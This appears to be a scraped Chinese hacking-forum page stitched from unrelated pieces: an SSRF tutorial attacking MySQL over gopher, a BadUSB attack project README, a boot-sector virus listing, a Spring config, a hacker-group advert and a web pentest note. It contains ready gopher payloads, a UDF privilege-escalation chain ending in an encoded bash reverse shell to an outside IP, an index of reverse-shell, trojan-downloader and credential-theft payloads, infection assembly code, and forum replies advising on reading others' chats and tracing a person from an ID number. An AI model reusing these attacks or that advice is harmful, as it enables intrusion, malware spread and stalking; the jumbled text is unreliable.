来执行一些测试命令： MYSQL $ mysql -h127.0.0.1 -uroot -e "select * from flag.test union select user(),'www.sqlsec.com';" +----------------+----------------------------------------+ | id | flag | +----------------+----------------------------------------+ | 1 | flag{71***************************316} | | [email protected] | www.sqlsec.com | +----------------+----------------------------------------+ 中止 tcpdump 使用 Wireshark 打开 mysql.pcapng 数据包，追踪 TCP 流 然后过滤出发给 3306 的数据： 保存为原始数据「Show data as Raw」，并且整理成 1 行： PAYLOAD a100000185a23f0000000001080000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640064035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c045f706964033530380f5f636c69656e745f76657273696f6e06352e362e3531095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420313d0000000373656c656374202a2066726f6d20666c61672e7465737420756e696f6e2073656c656374207573657228292c277777772e73716c7365632e636f6d270100000001 生成 gopher 数据流 然后使用如下的 Python3 脚本将数据转化为 url 编码： PYTHON import sys def results(s): a=[s[i:i+2] for i in range(0,len(s),2)] return "curl gopher://127.0.0.1:3306/_%"+"%".join(a) if __name__=="__main__": s=sys.argv[1] print(results(s)) 运行效果如下： SSRF 之 查询数据库 本地 curl 请求这个 gopher 协议的数据包看看： 从图上可以看到 gopher 请求的数据包已经成功执行了，user () 和 数据库中的 flag 都可查询出来了。 如果 curl 请求提示是一个二进制文件无法直接显示，所可以使用 --output 来输出到文件中，然后手动 cat 文件同样也可以看到 gopher 协议交互 MySQL 的执行结果： BASH $ curl gopher://127.0.0.1:3306/_xxx --output mysql_result SSRF 之 MySQL 提权 SSRF 攻击 MySQL 仅仅查询数据意义不大，不如直接 UDF 提权然后反弹 shell 出来更加直接，下面尝试使用 SSRF 来 UDF 提权内网的 MySQL 应用，关于 MySQL 更详细的文章可以参考我之前 MySQL 漏洞利用与提权 MySQL 漏洞利用与提权 。 首先来寻找 MySQL 的插件目录，原生的 MySQL 命令如下： BASH $ mysql -h127.0.0.1 -uroot -e "show variables like '%plugin%';" tcpdump 监听，使用 Wirshark 分析导出原始数据： 使用脚本将原始数据转换 gopher 协议，得到的数据如下： BASH curl gopher://127.0.0.1:3306/_%a2%00%00%01%85%a2%3f%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%65%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%04%33%35%35%34%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%36%2e%35%31%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%20%00%00%00%03%73%68%6f%77%20%76%61%72%69%61%62%6c%65%73%20%6c%69%6b%65%20%0a%27%25%70%6c%75%67%69%6e%25%27%01%00%00%00%01 放入到 BP 中请求的话记得需要二次 URL 编码，可以直接获取到插件的目录信息 : 拿到 MySQL 的插件目录为：/usr/lib/mysql/plugin/ 接着来写入动态链接库，原生的 MySQL 命令如下： BASH # 因为 payload 太长 这里就先进入 MySQL 控制台 $ mysql -h127.0.0.1 -uroot MariaDB [(none)]> SELECT 0x7f454c460...省略大量payload...0000000 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so'; 关于 UDF 提权的 UDF 命令可以参考国光写的这个 UDF 提权辅助页面：MySQL UDF 提权十六进制查询 | 国光 tcpdump 监听到的原始数据后，转换 gopher 协议，SSRF 攻击写入动态链接库，因为这个 gopher 协议的数据包非常长，BP 这边可能会出现 Waiting 卡顿的状态： 不过问题不大，实际上 udf.so 已经成功写入到 MySQL 的插件目录下了： 以此类推，创建自定义函数： BASH $ mysql -h127.0.0.1 -uroot -e "CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';" 最后通过创建的自定义函数并执行系统命令将 shell 弹出来，原生命令如下： BASH $ mysql -h127.0.0.1 -uroot -e "select sys_eval('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMTEuNTUuMi8yMzMzIDA+JjE=|base64 -d|bash -i')" 因为国光测试默认情况下弹不出来，所以这里将原始的 bash 反弹 shell 命令给编码了： 这个编码实际上就是 JS Base64 一下，国光我模仿国外的那个网站，自己写了个页面：安全小公举 | 国光 tcpdump 监听到的原始数据后，转换 gopher 协议，BP 二次编码请求一下，然后 SSRF 攻击成功弹出 shell： 靶场源码 另外也附上了本次靶场的源码：Github - sqlsec/ssrf-vuls 有动手能力的可以自行搭建，Docker 保姆式的版本的放在知识星球里面 （恰烂钱警告） 本文来自国光小友。另感谢九世

收集的资料文件可以都发出来啦，大家共同学习。

怎么查询对方的微信聊天记录啊？求助

谢谢大佬

本项目利用了USB协议的漏洞。通过改变USB内部固件，接入USB接口后，模拟外接鼠标和键盘的功能，使目标主机执行构造好的命令。 介绍 和我们大多数人一样，BadUSB 最初是在机器人先生中引入的，是 FSociety 最受欢迎的工具之一。无论是下载木马到服务器控制受害者主机，还是 Darlene 在停车场扔一堆 USB 钓鱼设备，BadUSB 都是最重要的物理武器之一。 优势 常用于USB攻击领域，多年前的老USB病毒（自动）autorun。inf，但该文件现在很容易被杀毒软件检测到，并自动运行。J inf，BadUSB是利用USB协议的一个漏洞，通过改变USB固件的内部，在USB端口正常访问后，模拟鼠标、键盘的外部功能，从而使目标主机执行一直精心构造好命令。在这个过程中不会引起杀毒软件、防火墙的一丝怀疑。并且由于是固件级别，U盘格式化无法阻止其内部代码的执行。 我最近最喜欢的是leonardo_Arduino板子，因为同样是USB使用，Windows、Linux、Mac等操作系统默认存在leonardo_Arduino USB接口驱动，不用去网络下载专用驱动。另外，给BADUSB烧录的程序也很简单，大部分键盘、鼠标键为模拟键，上手容易。 BadUSB 也是社会工程的一个很好的例子。它利用了人们的好奇心。据估计，超过 90% 的人会想看看他们在路边捡到的 USB 里面有什么。 教程 视频地址 视频：BsdUSB Compiler简介 视频：BadUSB驱动安装及代码编写 视频：BadUSB基本操作 详细步骤请看简书 目录 BadUSB │ LICENSE │ README.en.md │ README.md │ ├─AddUser_StartService │ AddUser_Enable3389(tools).ino │ AddUser_EnableFTP(tools).ino │ ├─BlueScreen │ BlueScreen1(DOS).ino │ BlueScreen2(DOS).ino │ BlueScreen3(DOS).ino │ BlueScreen_xp_win7(DOS).ino │ DelayedBlueScreen (DOS).ino │ RegistryWriteBlueScreen (DOS).ino │ RegistryWriteBlueScreenGeneralUse (DOS).ino │ ├─CobaltStrike_Trojanlinkage │ │ Bitsadmin_TrojanExecution (LinkageWithCS).ino │ │ Pl_TrojanExecution (LinkageWithCS).ino │ │ PSL_TrojanExecution (LinkageWithCS).ino │ │ PY_TrojanExecution (LinkageWithCS).ino │ │ Regsvr32_TrojanExecution (LinkageWithCS).ino │ │ │ ├─CobaltStrike_Payload │ │ payload.bin │ │ payload.c │ │ payload.cs │ │ payload.java │ │ payload.pl │ │ payload.ps1 │ │ payload.py │ │ payload.rb │ │ payload.sct │ │ payload.txt │ │ payload.vba │ │ │ └─CounterStrikeTrojanTutorial │ CounterStrike.jpg │ CounterStrikeTutorial.png │ ├─CodePrincipleInterpretation │ ArduinoKeyCodeBase.ino │ InstructionsOn_setup_loop_Methods.txt │ MSF_TrojanMakingTutorial.txt │ ├─DNSHijack │ DOS_CommandSetMultipleDNS(DNSHijack).ino │ PSL_CommandSetMultipleDNS(DNSHijack).ino │ ├─Linux_Built-inReverseShell │ LinuxReverseShell (CodeExecution).ino │ LinuxReverseShell(BashShell).ino │ LinuxReverseShell(PerlShell).ino │ ├─MSF_Trojanlinkage │ shell.apk │ shell.asp │ shell.aspx │ shell.elf │ shell.exe │ shell.jar │ shell.jsp │ shell.macho │ shell.php │ shell.pl │ shell.psl │ shell.py │ shell.sh │ shell.war │ Shell_TrojanGenerationConfiguration.txt │ ├─OSX_Built-inReverseShell │ OSX_SystemReverseConnection (dns_shell).ino │ OSX_SystemReverseConnection (perl_shell).ino │ OSX_SystemReverseConnection (ruby_shell).ino │ ├─PSL_FullScreen-HACKED │ ├─FullScreenHackedv0 │ │ │ get.ps1 │ │ │ │ │ └─FullScreenHackedv │ │ FullScreenHackedv.ino │ │ │ ├─FullScreenHackedv2 │ │ FullScreenHackedv2.ino │ │ wall.ps1 │ │ │ └─FullScreenHackedv3 │ │ get.ps1 │ │ │ └─FullScreenHackedv3 │ FullScreenHackedv3.ino │ ├─RunProgramOn_UDrive_ExpandScopeOfIntrusion │ ├─UdiskRun │ │ UdiskRun.ino │ │ │ ├─UdiskRunv2 │ │ UdiskRunv2.ino │ │ │ └─UdiskRunv3 │ UdiskRunv3.ino │ ├─Site_AWord_IntrusionCode │ AspSentenceTrojanWrite(webServerVersion).ino │ AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino │ AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino │ AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino │ AspxSentenceTrojanWrite(webServerVersion).ino │ JspSentenceTrojanWritten (JSP_websiteServerUse).ino │ JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino │ PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino │ PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino │ PHP_TrojanWrite(usedByPHP_websiteServer).ino │ ├─SpecificFunctionCode │ AddUserCode(Tools).ino │ Alt-f4_Loop.ino │ ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino │ EnablePSL_RemoteConnection(Tools).ino │ ForcedDeletionOf360Processes(Tools).ino │ ForceShutDownCommand(Tool).ino │ Hide_CMD_Window(Display).ino │ MouseKeepsMoving(Tools).ino │ OpenPort445.ino │ OpenSpecified_webPage.ino │ ShiftBackdoor.ino │ SimplyChangeAllUsersPasswords(TrickItem).ino │ SimplyShutDownMachine(TrickItem).ino │ TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino │ ├─TrojanDownloader │ ├─CERTUTIL_DownLoader │ │ CERTUTIL_DownLoader_MSF.ino │ │ │ ├─FTP_DownLoader │ │ FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino │ │ │ ├─JAVA_DownLoader │ │ JavaTrojanWrite(TargetEnvironmentRunJava).ino │ │ server.java │ │ │ ├─PSL_DownLoader │ │ Downloa_PSL_Trojan-Execute_aSecondTime.ino │ │ LinkServer_MSF_PSL_Download.ino │ │ LinkServer_PSL_Download.ino │ │ PSL_DownLoader0.ino │ │ PSL_DownLoader1.ino │ │ PSL_DownLoader2.ino │ │ PSL_DownLoader3.ino │ │ PSL_DownLoader4.ino │ │ PSL_Downloader_Win&Linux_General.ino │ │ PSL_Writes_Bounces.ino │ │ │ └─PY_DownLoader │ PyShellServer.py │ Py_TrojanWrite(TargetEnvironmentRunPython).ino │ ├─Ubuntu_InformationGathering │ BasicTerminalCommandsForUbuntu(Display).ino │ UbuntuInformationCollectionTXT_File(Information).ino │ ├─WiFi_ConnectionTrojan │ ForceConnectionToSpecifiedWiFi-DownloadPSL_TrojanRun.ino │ └─WiFi_PasswordAcquisition WiFiPasswordCapture(tool).ino WiFiPasswordExport(tool).ino 演示 视频地址 视频：【Hardware Hacker】控制通过WiFi上传执行、运行、编写BADUSB的HID脚本以及额外的小1 视频：【Hardware Hacker】控制通过WiFi上传执行、运行、编写HID脚本BADUSB 以及一个额外的小 2 视频：[BADUSB 演示] U 盘攻击：忽略任何杀软，在 3 秒内破解您的计算机！ 视频：【BADUSB Demo】入侵方形大屏，附教程1 视频：【BADUSB Demo】入侵方形大屏，附教程2 视频：【BADUSB demo】BADUSB实现记录键盘 视频：【BADUSB demo】修改账号密码使用+关闭系统进程+蓝屏测试 先进的 视频地址 视频：Badusb&MSF联动 视频：使用Nethunter启动BadUSB 常见问题和错误 视频地址 视频：BadUSB代码写异常处理 扩大 视频地址 视频：【Hardware Hacker】九块钱做一个BadUSB 视频：【Hardware Hacker】可以直接替换大黄鸭和Wifiducky的新BadUSB 视频：BadUSB教程 Digispark +中文BadUSB 更新 2021.02.06 更新代码，部分是从其他爱好者那里搜索到的开源代码，部分是我认为比较好用的与MSF链接的方法流程和Arduino Leonardo基础关键代码 2021.02.14更新代码，借鉴其他好项目，加入木马，DNS劫持CobaltStrike联动代码，Linux和osx反向shell，WIFI连接木马，内置WIFI密码接入，网站一句话入侵代码，PSL全屏破解镜像，运行U盘程序_扩大入侵范围，实现大量实用功能代码，情人节快乐！ 关联 代码已经上传到GitHub和Gitee，求star，其他项目也很好玩，继续求star。 GitHub： https://github.com/wangwei39120157028/BadUSB Gitee： https://gitee.com/wwy2018/BadUSB

从列表l（ist）~集合（set）.txt

可以对对方进行远控，然后获取对方键盘记录。但是直接获取记录......

我知道一个人的身份证号码，怎么得知他的电话号码和地址

可以去查询身份证所办的手机号码，地址的话可以去找个身份证查询工具输入身份证号就能出现身份证地址

问题很重要么?只管做事就行

怎么查询对方的微信聊天记录啊？求助

。

被劫持了？

四、DOS病毒之引导型病毒 4.1 病毒的重定位 病毒重定位的原因 正常源程序在编译的时候，变量在内存中的位置都被计算好了，程序装入内存时，系统不会为它重定位。 病毒感染HOST后，由于其依附到不同HOST程序中的位置不尽相同，病毒随HOST载入内存后，病毒中的各个变量在内存中的位置也会随之发生变化。 病毒为了能正常使用其变量，必须重新定位。 病毒重定位的方法 借助Call指令实现 当执行Call指令时，它会先将返回地址（紧接着call语句之后的那条语句在内存中的真正地址）压入堆栈，然后将IP置为Call语句所指向的地址。 在被调子程序遇到ret指令后，就会将堆栈顶端的地址弹出来，并将其置入IP中，实现返回。 病毒的重定位就是利用call指令对IP的操作来实现的。 实现过程 VStart： ... call delta delta: pop ebp sub ebp, offset delta-VStart lea eax, [offset Var2+ebp] 4.2 引导型病毒 引导型病毒概念 指专门感染主引导扇区和引导扇区的计算机病毒。感染主引导区的病毒称作MBR病毒；感染引导区的病毒称作BR病毒。 引导型病毒的基本原理 通过感染主引导扇区和引导扇区，在启动系统时即获取控制权。 引导型病毒在感染主引导扇区/引导扇区时，将被感染扇区的“内容”写入其他扇区，并在FAT中标示该扇区所在簇为坏簇。 为能在机器运行过程中能实施感染，通过修改内存大小，截取高端内存，实现常驻内存。 引导型病毒的触发与INT 13H 引导型病毒的触发 引导型病毒在获取控制权后，修改INT 13H入口地址使其指向病毒中断服务程序，处于可激活态 当系统/用户进行磁盘读写时调用INT 13H，激活病毒。 病毒别激活后，可根据感染条件实施感染、根据爆发破坏条件破坏系统并表现自己。 引导型病毒样例分析 修改0：413h(减小可用内存) mov ax, ds:[413h] dec ax dec ax mov ds:[413h], ax 计算高端内存地址 mov cl, 6 ;通过移位得到段地址 shl ax, cl mov es, ax 搬移病毒至高端内存 mov si, sp mov cx, VirusSize cld rep movsb 跳至端内存 push ax mov di, offset @@HighAddr push di retf 修改INT 13H中断向量 xchg ds:[13h*4+2], ax mov cs:[OldInt13Seg], ax mov ax, offset @@NewInt13 xchg ds:[13h*4],ax mov cs:[OldInt13Off], ax 新INT13H cmp dx, 0000h jnz short @@JmpOldInt13 cmp ah, 02h //读磁盘扇区 jnz short @@JmpOldInt13 cmp cx, 0001h //主引导扇区 jnz short @@jmpOldInt13 call @@OptDisk //条件： 读软盘主引导扇区，则感染 感染 @@OptDisk: ;传染dl表示的磁盘（dl-0 A: 80:C) pusha push ds push es ;保存段址与通用寄存器 push cs pop es push cs pop ds ;使ds=es=cs mov bx,OFF OldBootSpace mov ax,0201h mov cx,0001h mov dh,00h call @@CallInt13 ;读原引导扇区 jc short @@OptOver 感染 mov di,bx cmp ds:[di.VirusFlag], ’V’ ;判断是否已经有病毒？ jz short @@OptOver ;若有，则退出 cmp dl,00h jz short @@IsOptFlopyDisk @@IsOptHardDisk: mov cx,0002h ;若是硬盘，保存在0面0道2扇区 jmp short @@SaveOldBoot @@IsOptFlopyDisk: mov cx,79*100h+17 ;若是软盘，保存在0面79道17扇区 感染@@SaveOldBoot: mov ax, 0301h mov dh, 0hcall @@CallInt13 ;保存原引导扇区jc short @@OptOvermov si, OFF @@Startcldmovswmovsb ;修改原扇区首指令（Jmp near 3字节） 感染 mov di, OFF @@Begin+200h mov si, OFF @@Begin mov cx, OFF @@End-OFF @@Begin cld rep movsb ;修改原引导扇区指令cx字节 mov ax, 0301h mov cx, 0001h mov dh, 00h call @@CallInt13 ;写回已经被修改了的引导程序@@OptOver: ;退出传染 pop es pop ds ;恢复段址与通用寄存器 popa 从软盘引导 call @@OptDisk ;调用传染模块 pop dx @@ReadOldFlopyBoot: ;读出原软盘引导程序 mov ax,0201h mov cx,79*100h+17 ;传染时将原引导程序保存在0面79道17扇区中 mov dh,00h call @@CallInt13 jc short @@ReadOldFlopyBoot ;失败，继续读直到成功 从软盘引导 @@ExecOldBoot: cmp es:[bx.Flags],0aa55h jnz @@ExecOldBoot mov ah,02h int 1ah ;取系统时间 cmp cx,22*100h+30 ;是否大于22：30分 jb @@ExitDisp ;未到，则不显示 lea si,VirusMsg 从软盘引导 @@DispMsg: mov al,cs:[si] inc si mov ah,0eh int 10h ;显示al中的字符 or al,al jnz @@DispMsg xor ax,ax int 16h ;键盘输入@@ExitDisp:mov cx,0001h ;恢复cx初值push espush bxretf ;去执行原引导程序 从硬盘引导@@ReadOldHardBoot:mov ax,0201h mov cx,0002h ;传染时将原硬盘主引导程序保存在0面0道2扇区中mov dh,00h call @@CallInt13 ;读出jc short @@ReadOldHardBoot ;失败，继续读直到成功jmp short @@ExecOldBoot ;去执行原引导程序 4.3 示例病毒感染的清除 通过备份主引导扇区进行还原 通过恢复中断向量表实现对病毒的灭活 引导型病毒的特点与清除 驻留内存 一般采用修改0：413地址内的值的方法，但不够隐蔽。 隐形技术：当病毒驻留时，读写引导区均对原引导区操作，好像没有病毒一样 机密技术：一般加密分区表，使无毒盘启动时无法读取硬盘 优点： 隐蔽性强、兼容性强 缺点： 传染速度慢，一定要用带毒软盘启动才能传到硬盘 杀毒容易，只需改写引导区即可。 引导型病毒的判断与清除 通过查看JMP指令判断是否正常 通过检查引导扇区和内存容量判断是否有病毒驻留 对主引导病毒，不能通过Format清除，可以用FDisk/MBR命令修复，但可能会带来危险 最好的办法是对主引导扇区进行备份。

1-pom.xml <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.12</version> </dependency> <dependency> <groupId>org.mybatis</groupId> <artifactId>mybatis</artifactId> <version>3.5.2</version> </dependency> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java</artifactId> <version>8.0.30</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-webmvc</artifactId> <version>5.3.8</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-jdbc</artifactId> <version>5.2.0.RELEASE</version> </dependency> <dependency> <groupId>org.aspectj</groupId> <artifactId>aspectjweaver</artifactId> <version>1.8.13</version> </dependency> <!-- https://mvnrepository.com/artifact/org.mybatis/mybatis-spring --> <dependency> <groupId>org.mybatis</groupId> <artifactId>mybatis-spring</artifactId> <version>2.0.2</version> </dependency> <dependency> <groupId>org.projectlombok</groupId> <artifactId>lombok</artifactId> <version>1.18.10</version> </dependency> </dependencies> <build> <resources> <resource> <directory>src/main/resources</directory> <includes> <include>**/*.properties</include> <include>**/*.xml</include> </includes> <filtering>true</filtering> </resource> <resource> <directory>src/main/java</directory> <includes> <include>**/*.properties</include> <include>**/*.xml</include> </includes> <filtering>true</filtering> </resource> </resources> </build> 2.config配置文件 <?xml version="1.0" encoding="UTF8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:context="http://www.springframework.org/schema/context" xsi:schemaLocation="http://www.springframework.org/schema/beans https://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/context https://www.springframework.org/schema/context/spring-context.xsd"> <context:component-scan base-package="com.kuang.mapper"/> <context:annotation-config/> <!-- 剥离mybatis数据源 ，注册到spring中--> <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource"> <property name="driverClassName" value="com.mysql.cj.jdbc.Driver"/> <property name="url" value="jdbc:mysql://localhost:3306/mybatis?useSSL=false&amp;useUnicode=true&amp;characterEncoding=utf8"/> <property name="username" value="root"/> <property name="password" value="123456"/> </bean> <bean id="sqlSessionFactory" class="org.mybatis.spring.SqlSessionFactoryBean"> <property name="dataSource" ref="dataSource" /> <!--关联mybatis配置文件--> <property name="configLocation" value="classpath:mybatis-config.xml"/> <property name="mapperLocations" value="classpath:com/kuang/mapper/*.xml"/> </bean> <bean id="sqlSession" class="org.mybatis.spring.SqlSessionTemplate"> <!--只能使用构造器注入sqlSessionFactory，因为它没有set方法--> <constructor-arg index="0" ref="sqlSessionFactory" /> </bean> </beans>

牛的。

CHT攻防小组，创始于2016年；是近几年新兴起的黑客攻防团队。2017年创建【CHT】论坛。下面可以了解我们取得的成就，以及团队的介绍。在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。 团队数据库里集中各类大程序、模板、系统0day（用为网络安全研究使用），目前CHT （The Hacker World 黑客世界）已是全球最大的中文黑客论坛，包含板块众多，可以学习网络安全、编程技术、渗透测试、逆向破解等各类黑客攻防教程。 ------------------------------------------------------------------------------------------------------------------- 业务合作我们的联系方式： 渗透测试/逆向破解/APT病毒分析/定制开发等项目。 请使用Telegram（电报 7X24小时在线）关注我们的频道：@HackAptTeam 业务合作直接联系组长或者从上方频道进入：@HackAptTeam 加入Telegram讨论群，交流黑客攻防技术，群内不定期分享工具，1day等： @HackAptTeam ------------------------------------------------------------------------------------------------------------------- 合作流程 请移步到我们的业务合作主页。https://hackhub.org/cn/hack.html 团队成员介绍与我们取得的成就：https://hackhub.org/cn/hack.html English CHT Attack and Defense Team, founded in 2016; It is a newly emerged hacker attack and defense team in recent years. In 2017, the [CHT] Forum was created. Below you can find out what we have achieved and the introduction of the team. In this rapidly changing Internet era, we remain committed to creating the best community to share network technology. The team database collects all kinds of large programs, templates, and systems for 0day (used for network security research). At present, CHT (The Hacker World) has become the world's largest Chinese hacker forum, including many sections, where you can learn various hacker attack and defense courses such as network security, programming technology, penetration testing, reverse cracking, etc. ------------------------------------------------------------------------------------------------------------------- Our contact information: Please follow us on Telegram (7X24 hours online) :@HackAptTeam Or contact the team leader directly: @HackAptTeam Join Telegram discussion groups: @HackAptTeam ------------------------------------------------------------------------------------------------------------------- русск Тактическая группа, основанная в 2016 году; Новая команда хакеров, появившаяся в последние годы. Форум создан в 2017 году. Ниже вы можете увидеть наши достижения, а также вступление в команду. В этот быстроменяющийся век интернета, мы сохраняем начальные стадии и создаем лучшие сообщества для совместного обмена сетевыми технологиями. В командной базе данных централизованы различные программы, шаблоны, системы 0day (используемые для исследований по кибербезопасности), и в настоящее время хt является крупнейшим форумом по изучению хакеров в мире, в котором существует множество доскопов, которые могут изучать кибербезопасность, программирование, просачивание тестов, ретроградный взлом и т.д. ------------------------------------------------------------------------------------------------------------------- Бизнес-сотрудничество наши контакты: Инфильтрационные тесты/ретровирусный анализ /APT/проекты, разработанные на заказ. Пожалуйста, следите за нашим каналом в Telegram (телеграф 7X24 - часовой онлайн) : @HackAptTeam Прямое сообщение с руководителем группы или с верхнего канала: @ip1949 Присоединяйтесь к обсудительной группе Telegram для обмена хакерскими технологиями защиты, непериодического обмена инструментами внутри группы, 1day и т.д: @HackAptTeam ------------------------------------------------------------------------------------------------------------------- Совместный процесс Пожалуйста, пройдите на нашу страницу делового сотрудничества. @HackAptTeam @HackAptTeam 한국어 cht 공격과 방어 팀, 2016년에 설립.최근 몇 년 새로 떠오른 해커 공격과 방어 팀이다.2017년 「 cht 」 포럼 설립.아래에 우리 팀의 성과와 성과에 대해 알아볼 수 있습니다.급변하는 인터넷 시대에 우리는 초심을 잃지 않고 최고의 커뮤니티를 만들어 인터넷 기술을 공유하고자 합니다. 현재 cht (the hacker world 해커월드)는 세계 최대의 중국어 해커 포럼으로 네트워크 보안, 프로그래밍 기술, 침투 테스트, 리버스 크랙 등 각종 해커 공격과 방어 과정을 배울 수 있는 많은 분야를 포함하고 있다. ------------------------------------------------------------------------------------------------------------------- 업무 협력 우리들의 연락처 방법: 침투 테스트/리버스 크랙/apt 바이러스 분석/맞춤형 개발 등의 프로젝트가 있다. "@hack1949"채널을 텔레그램 (telegram)으로 시청해 주시기 바랍니다 팀장과 직접 연락하거나 상단 채널을 통해 업무 협력:@HackAptTeam 텔레그램 토론그룹에 가입하기, 해커 공방 기술 교류, 그룹 내 비정기적으로 도구 나누기, 1day 등: @HackAptTeam ------------------------------------------------------------------------------------------------------------------- 협력 프로세스 日本語 CHT攻防グループは、2016年に創設されました;近年台頭してきたハッカー攻撃チームです。2017年に「CHT」というフォーラムを立ち上げました。以下は私達の達成したことを理解して、チームの紹介を加えます。このめまぐるしく変化するインターネットの時代に、私たちは初心を維持し、共同でインターネット技術を交流するために最高のコミュニティを創造します。 現在CHT (The Hacker Worldハッカー世界)は世界最大の中国語ハッカーフォーラムとなっています。多くのセクションが含まれており、ネットワークセキュリティ、プログラミング技術、ペネトレーションテスト、逆クラックなどのハッキングと攻撃の教程を学ぶことができます。 ------------------------------------------------------------------------------------------------------------------- 業務提携こちらの連絡先です。 ペネトレーションテスト/逆クラック/APTウイルス解析/カスタマイズ開発などの項目があります。 Telegram(電報7 × 24時間オンライン)でチャンネルをチェックしてください:@HackAptTeam 業務提携は直接チーム長に連絡するか上チャンネルから入ります:@iP1949 Telegramの討論グループに参加して、ハッキングの攻防技術を交流します。グループ内で不定期にツールを共有します。 @HackAptTeam ------------------------------------------------------------------------------------------------------------------- 協力のプロセスです 私どもの業務提携ホームページへご移動願います。https://www.thehackerworld.com/cn/hack.html チームメンバー绍介と我々の成就:https://www.cnhackteam.org/ 查看完整article

如何学习黑客？Web（网站）渗透测试 eb渗透笔记如下，大家可以去看看！ 0x00 序言这篇笔记是对Web应用程序渗透中的经典步骤的总结。我会将这些步骤分解为一个个的子任务并在各个子任务中推荐并介绍一些工具。 本文展示的许多技巧来自这里，作者已允许转载。 请记住我介绍的这些步骤都是迭代的，所以在一次渗透过程中，你可能会使用他们多次。举个栗子，当你设法获取一个应用程序的不同等级的权限时，比如从普通用户提升到管理员用户，可能就需要迭代利用。 序言最后需要说明的是，这篇笔记的很多地方使用了收费的PortSwigger的Burp Suite Professional。对此我表示抱歉，但我认为这个工具还是物超所值的。 0x01 信息收集在一次Web渗透过程中，信息收集的目的是站在旁观者的角度，去了解整个Web应用的全貌。1. 目标确认工具简介Whois基于RFC 3912，用于查询域名相关信息的协议。Dig域名信息获取工具(Domain information groper)简称，是一个命令行的用于查询DNS服务器的网络管理工具。DNSRecon自动化DNS枚举脚本，由darkoperator维护。 1.1 域名注册信息通过如下步骤确认目标所有者信息： Whois 目标域名/主机名whois http://example.com解析目标域名/主机名的IP地址dig +short http://example.comWhois IP地址whois 104.27.178.12分析输出结果如果目标开启了whois隐私保护，那么返回的结果可能是经过混淆的。 ！！不要攻击未经授权的站点。作为渗透测试人员，有责任在测试之前明确自己有没有获得目标所有者赋予的权限对目标进行测试。这也是为什么目标确认是开始渗透测试的第一步。1.2 DNS信息查询我喜欢去 https://dnsdumpster.com/ 查询目标站点的DNS信息，这是一款很不错的在线DNS信息查询工具。 正向查询dig +nocmd example.com A +noall +answer dig +nocmd example.com NS +noall +answer dig +nocmd example.com MX +noall +answer dig +nocmd example.com TXT +noall +answer dig +nocmd example.com SOA +noall +answer ... dig +nocmd example.com ANY +noall +answer (This rarely works)反向查询dig -x 104.27.179.12 dig -x 104.27.178.121.3 测试域传送漏洞域传送是一种DNS事务，用于在主从服务器间复制DNS记录。(译者注：可以看这个)虽然如今已经很少见主机会开启，但是还是应该确认一下。一旦存在域传送漏洞，就意味着你获取了整个域下面所有的记录。 域传送漏洞很容易避免。至少管理员可以设置只允许白名单内的IP列表可以进行域传送请求。使用示例dig -t NS zonetransfer.me +short dig -t AXFR zonetransfer.me @nsztm1.digi.ninja dig -t AXFR zonetransfer.me @nsztm2.digi.ninjaDNSRecon 可以自动化进行，而且往往会返回更多额外的信息。dnsrecon -d example.com2. OSINT 公开情报收集工具描述Recon-NGTim 'Lanmaster53' Tomes写的公开情报工具框架，由社区维护。http://recon-ng.com/MaltegoMaltego 是一款交互式的数据挖掘工具，它可以渲染出图用于关联分析。theharvestertheHarvester 可以从不同的公开资源中收集邮箱、子域名、虚拟主机、开放的端口/主机指纹和员工姓名等信息 我本想在这份笔记中包含详细的OSINT的介绍，但是想了想决定不这样做。因为我觉得这个部分可以单独写一篇（可能在之后的几篇中）。 在这篇笔记中我就介绍一些非常棒的关于OSINT的干货，我想渗透测试者们对于这些干货应该非常熟悉： Michael Bazzellhttps://inteltechniques.comOpen Source Intelligence TechniquesGoogle Dorkinghttps://www.exploit-db.com/google-hacking-database/0x02 Mapping在一次渗透测试过程中，Mapping的目的是站在一个普通用户的角度去了解整个应用的全貌。1. 工具工具介绍Nmap带服务识别和操作系统指纹识别的TCP/IP主机和端口扫描工具 1.1 端口扫描，服务识别，OS识别扫描前1000号TCP端口nmap 192.168.100.2Ping扫描8个本地主机(按ARP、ICMP、TCP 80的顺序)nmap –sP 192.168.100.0-7扫描80,443端口nmap -p 80,443 